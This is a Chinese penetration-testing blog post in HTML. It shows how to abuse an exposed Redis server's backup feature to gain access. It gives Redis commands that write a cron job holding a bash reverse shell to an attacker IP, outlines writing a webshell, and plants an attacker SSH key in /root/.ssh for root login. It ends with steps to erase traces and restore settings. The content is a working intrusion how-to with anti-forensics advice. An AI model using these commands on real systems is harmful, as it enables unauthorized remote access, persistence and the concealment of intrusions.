<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="0x01 利用redis备份写定时任务反弹shell1原理：利用redis备份功能进行文件操作 开始前可以做个备份，实际攻击中最好先执行config get dir 记清楚原来备份路径，方便还原擦除痕迹利用redis-cli -h 目标ip 连接redis服务器 执行以下命令： 1234567set x &quot;\n* * * * * bash -i &gt;&amp; &#x2F;dev&amp;#">
<meta property="og:type" content="article">
<meta property="og:title" content="Redis通过备份功能实现的三种攻击方法">
<meta property="og:url" content="https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/index.html">
<meta property="og:site_name" content="乌兹永远的神">
<meta property="og:description" content="0x01 利用redis备份写定时任务反弹shell1原理：利用redis备份功能进行文件操作 开始前可以做个备份，实际攻击中最好先执行config get dir 记清楚原来备份路径，方便还原擦除痕迹利用redis-cli -h 目标ip 连接redis服务器 执行以下命令： 1234567set x &quot;\n* * * * * bash -i &gt;&amp; &#x2F;dev&amp;#">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191112192818604.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2019111219294241.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM5MzI2ODE2,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2019111219294889.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191112193001328.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM5MzI2ODE2,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191112193052258.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM5MzI2ODE2,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191112193119943.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191112193340271.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191112193319634.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191112193259685.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191112193400460.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191112193515249.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM5MzI2ODE2,size_16,color_FFFFFF,t_70">
<meta property="article:published_time" content="2020-06-03T14:22:29.000Z">
<meta property="article:modified_time" content="2020-06-03T14:22:58.207Z">
<meta property="article:author" content="upkn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20191112192818604.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>Redis通过备份功能实现的三种攻击方法</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories">Category</a></li>
         
          <li><a href="/friendlinks">Friendlink</a></li>
         
          <li><a href="/about">About</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" href="/2020/06/03/Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E5%A4%8D%E7%8E%B0/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&text=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&title=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&is_video=false&description=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Redis通过备份功能实现的三种攻击方法&body=Check out this article: https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&title=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&title=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&title=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&title=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&name=Redis通过备份功能实现的三种攻击方法&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&t=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-利用redis备份写定时任务反弹shell"><span class="toc-number">1.</span> <span class="toc-text">0x01 利用redis备份写定时任务反弹shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02利用备份写入webshell"><span class="toc-number">2.</span> <span class="toc-text">0x02利用备份写入webshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-利用备份上传公钥，实现服务器免密登录"><span class="toc-number">3.</span> <span class="toc-text">0x03 利用备份上传公钥，实现服务器免密登录</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04清理痕迹，还原设置环境"><span class="toc-number">4.</span> <span class="toc-text">0x04清理痕迹，还原设置环境</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Redis通过备份功能实现的三种攻击方法
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">乌兹永远的神</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-06-03T14:22:29.000Z" itemprop="datePublished">2020-06-03</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
    </div>


      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="0x01-利用redis备份写定时任务反弹shell"><a href="#0x01-利用redis备份写定时任务反弹shell" class="headerlink" title="0x01 利用redis备份写定时任务反弹shell"></a>0x01 利用redis备份写定时任务反弹shell</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">原理：利用redis备份功能进行文件操作</span><br></pre></td></tr></table></figure>
<p>开始前可以做个备份，实际攻击中最好先执行config get dir 记清楚原来备份路径，方便还原擦除痕迹<br><img src="https://img-blog.csdnimg.cn/20191112192818604.png" alt="在这里插入图片描述"><br>利用redis-cli -h 目标ip 连接redis服务器</p>
<p>执行以下命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">set x &quot;\n* * * * * bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;192.168.199.187&#x2F;7999 0&gt;&amp;1\n&quot;     &#x2F;&#x2F;设置变量x,引号里为变量内容，这也备份的时候可以把内容写入备份目录</span><br><span class="line"></span><br><span class="line">config set dir &#x2F;var&#x2F;spool&#x2F;cron&#x2F;  &#x2F;&#x2F;修改备份目录到定时任务目录</span><br><span class="line"></span><br><span class="line">config set dbfilename root &#x2F;&#x2F;修改备份文件名为自己喜欢的名字</span><br><span class="line"></span><br><span class="line">save &#x2F;&#x2F;保存设置</span><br></pre></td></tr></table></figure>
<p>测试如下：<br><img src="https://img-blog.csdnimg.cn/2019111219294241.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM5MzI2ODE2,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>自己复现可以利用crontab -e查看定时任务是否成功写入<br><img src="https://img-blog.csdnimg.cn/2019111219294889.png" alt="在这里插入图片描述"><br>攻击机监听设置的定时任务指定反弹shell的端口 7779，一会儿攻击机就成功接收目标机反弹的shell<br><img src="https://img-blog.csdnimg.cn/20191112193001328.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM5MzI2ODE2,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h2 id="0x02利用备份写入webshell"><a href="#0x02利用备份写入webshell" class="headerlink" title="0x02利用备份写入webshell"></a>0x02利用备份写入webshell</h2><p>原理步骤和上面差不多。前提是知道网站绝对路径，这种方法适用于服务器权限不够，但是redis对web有写入权限。</p>
<p>参考链接：<a href="https://www.leavesongs.com/PENETRATION/write-webshell-via-redis-server.html" target="_blank" rel="noopener">https://www.leavesongs.com/PENETRATION/write-webshell-via-redis-server.html</a></p>
<h2 id="0x03-利用备份上传公钥，实现服务器免密登录"><a href="#0x03-利用备份上传公钥，实现服务器免密登录" class="headerlink" title="0x03 利用备份上传公钥，实现服务器免密登录"></a>0x03 利用备份上传公钥，实现服务器免密登录</h2><p>ssh-keygen -t rsa 一路回车生成密钥<br><img src="https://img-blog.csdnimg.cn/20191112193052258.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM5MzI2ODE2,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>将目录下密钥保存为1.txt (可以自定义)，执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(echo -e &quot;\n\n&quot;; cat id_rsa.pub; echo -e &quot;\n\n&quot;) &gt; 1.txt</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20191112193119943.png" alt="在这里插入图片描述"><br>将密钥设置为crack变量内容， 上传目标机<br><img src="https://img-blog.csdnimg.cn/20191112193340271.png" alt="在这里插入图片描述"><br>同样利用redis-cli -h 目标ip    连接目标redis服务器，修改备份路径和备份文件名。<br>修改备份文件路径为/root/.ssh（目标机密钥存放的路径，不同机器情况可能不一致）<br><img src="https://img-blog.csdnimg.cn/20191112193319634.png" alt="在这里插入图片描述"><br>修改备份文件名，保存退出。</p>
<p><img src="https://img-blog.csdnimg.cn/20191112193259685.png" alt="在这里插入图片描述"><br>尝试免密连接服务器，漏洞利用成功。<br><img src="https://img-blog.csdnimg.cn/20191112193400460.png" alt="在这里插入图片描述"></p>
<h2 id="0x04清理痕迹，还原设置环境"><a href="#0x04清理痕迹，还原设置环境" class="headerlink" title="0x04清理痕迹，还原设置环境"></a>0x04清理痕迹，还原设置环境</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">del payload  &#x2F;&#x2F;删除</span><br><span class="line"></span><br><span class="line">config set dir &#x2F;root   &#x2F;&#x2F;修改路径为攻击前路径（不同环境路径可能不一样）</span><br><span class="line"></span><br><span class="line">config set dbfilename dump.rdb &#x2F;&#x2F;修改备份文件名为默认文件名</span><br></pre></td></tr></table></figure>
<p>测试如下：<br><img src="https://img-blog.csdnimg.cn/20191112193515249.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM5MzI2ODE2,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories">Category</a></li>
         
          <li><a href="/friendlinks">Friendlink</a></li>
         
          <li><a href="/about">About</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-利用redis备份写定时任务反弹shell"><span class="toc-number">1.</span> <span class="toc-text">0x01 利用redis备份写定时任务反弹shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02利用备份写入webshell"><span class="toc-number">2.</span> <span class="toc-text">0x02利用备份写入webshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-利用备份上传公钥，实现服务器免密登录"><span class="toc-number">3.</span> <span class="toc-text">0x03 利用备份上传公钥，实现服务器免密登录</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04清理痕迹，还原设置环境"><span class="toc-number">4.</span> <span class="toc-text">0x04清理痕迹，还原设置环境</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&text=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&title=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&is_video=false&description=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Redis通过备份功能实现的三种攻击方法&body=Check out this article: https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&title=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&title=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&title=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&title=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&name=Redis通过备份功能实现的三种攻击方法&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://adkinguzi.github.io/2020/06/03/Redis%E9%80%9A%E8%BF%87%E5%A4%87%E4%BB%BD%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E7%9A%84%E4%B8%89%E7%A7%8D%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/&t=Redis通过备份功能实现的三种攻击方法" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2019-2020
    upkn
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories">Category</a></li>
         
          <li><a href="/friendlinks">Friendlink</a></li>
         
          <li><a href="/about">About</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
